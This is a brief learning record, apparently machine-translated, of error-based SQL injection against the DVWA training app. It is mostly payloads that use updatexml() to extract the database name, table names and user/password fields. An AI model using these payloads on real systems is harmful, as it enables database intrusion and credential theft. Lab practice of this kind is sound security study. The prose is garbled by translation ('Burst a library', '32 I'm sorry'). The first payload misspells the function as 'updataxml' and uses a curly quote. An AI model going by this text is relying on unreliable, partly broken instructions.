DVWA [SQL injection] error injection learning record

Or to sql-injection For example

Burst a library ：

Enter the query statement ：

1‘ and updataxml(1,concat(0x7e,database()),1)-- -

Get the database name dvwa

Pop a table name ：

-1' and updatexml(1,  concat( 0x7e,   ( select table_name from information_schema.tables where table_schema='dvwa'  limit 0,1),0x7e),1)-- -

-1' and updatexml(1,  concat( 0x7e,(select table_name from information_schema.tables where table_schema='dvwa'  limit 1,1),0x7e),1)-- -

  Next, it will explode users Inside the watch user and password Field . In the use of updatexml() There is something to pay attention to when using this function , Specific reference ： Portal

Enter the query statement ：

-1' and updatexml(1,concat(0x7e,substr((select concat(user,'|',password) from dvwa.users limit 0,1),1,31),0x7e),1)-- -

because updatexml Only support 32 I'm sorry , So it's best to use... Line by line concat limit And substr Blasting one by one , Just adjust the parameters

Unite the front , You can get user and password